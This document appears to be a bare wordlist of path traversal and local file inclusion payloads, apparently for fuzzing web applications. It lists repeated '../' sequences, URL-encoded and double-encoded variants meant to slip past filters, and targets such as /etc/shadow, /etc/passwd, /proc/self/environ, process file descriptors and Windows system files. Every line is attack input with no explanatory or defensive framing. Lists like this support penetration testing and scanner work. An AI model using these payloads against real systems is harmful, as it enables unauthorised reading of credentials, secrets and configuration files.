
../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
%2e%2e%2f
%2e%2e/
..%2f
%252e%252e%252f
%2e%2e%5c
..%5c
%252e%252e%255c
/etc/passwd
/etc/shadow
/etc/hosts
/etc/resolv.conf
/proc/self/cmdline
/proc/self/environ
/proc/self/exe
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/windows/win.ini
/windows/system32/drivers/etc/hosts
